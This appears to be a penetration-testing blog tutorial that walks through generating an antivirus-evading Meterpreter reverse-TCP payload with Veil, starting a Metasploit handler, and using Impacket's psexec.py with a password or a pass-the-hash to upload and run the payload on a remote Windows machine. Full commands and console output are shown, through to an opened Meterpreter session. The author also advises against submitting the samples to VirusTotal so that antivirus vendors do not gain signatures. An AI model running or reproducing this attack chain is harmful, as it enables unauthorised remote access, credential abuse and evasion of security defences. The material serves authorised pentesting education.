Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.
First of all, Veil is a nice little payload generator that will generate your windows payload all within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get setup and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.
Finally, you can use CoreLab’s python version of psexec to execute your payload on a remote machine. To install, simply download the latest version of Impacket and run setup.py.
root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz root@kali:~# tar -xzvf impacket-0.9.10.tar.gz root@kali:~# cd impacket-0.9.10/ root@kali:~/impacket-0.9.10# python setup.py install
Let’s walk through a quick example of using both of these tools.
First, we generate a payload:
root@kali:/opt/Veil# python Veil.py ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [?] What payload type would you like to use? 1 - Meterpreter - Python - void pointer 2 - Meterpreter - Python - VirtualAlloc() 3 - Meterpreter - Python - base64 Encoded 4 - Meterpreter - Python - Letter Substitution 5 - Meterpreter - Python - ARC4 Stream Cipher 6 - Meterpreter - Python - DES Encrypted 7 - Meterpreter - Python - AES Encrypted 8 - Meterpreter - C - void pointer 9 - Meterpreter - C - VirtualAlloc() 0 - Exit Veil [>] Please enter the number of your choice: 7 ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [?] What type of payload would you like? 1 - Reverse TCP 2 - Reverse HTTP 3 - Reverse HTTPS 0 - Main Menu [>] Please enter the number of your choice: 1 [?] What's the Local Host IP Address: 192.168.81.201 [?] What's the Local Port Number: 443 [*] Generating shellcode... ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Py2Exe [>] Please enter the number of your choice: 1 ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [!] Be sure to set up a Reverse TCP handler with the following settings: PAYLOAD = windows/meterpreter/reverse_tcp LHOST = 192.168.81.201 LPORT = 443 [!] Your payload files have been generated, don't get caught! root@kali:/opt/Veil# mv payload.exe TrustedSec.exe
Next, we start a multi/handler with “smart_migrate” enabled:
msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc [*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives. resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0 LHOST => 0.0.0.0 resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443 LPORT => 443 resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false ExitOnSession => false resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate AutoRunScript => post/windows/manage/smart_migrate resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
Now, we can use “psexec.py” to upload and execute our payload using username/password or username/hash:
Username/password example:
psexec.py TrustedSec:’InformationSecurityMadeSimple!’@192.168.81.129 cmd.exe
Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 [email protected] cmd.exe
Psexec session:
Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139..... [*] Found writable share ADMIN$ [*] Uploading file KDgwQrZj.exe [*] Opening SVCManager on 192.168.81.139..... [*] Creating service rWGK on 192.168.81.139..... [*] Starting service rWGK..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe [*] Uploading TrustedSec.exe to ADMIN$\/ C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on 192.168.81.139..... [*] Stoping service rWGK..... [*] Removing service rWGK..... [*] Removing file KDgwQrZj.exe.....
Reap the shellz:
[*] Sending stage (751104 bytes) to 192.168.81.129 [*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400 [*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate' [*] Current server process: TrustedSec.exe (1436) [+] Migrating to 632 [+] Successfully migrated to process
BooYah!!!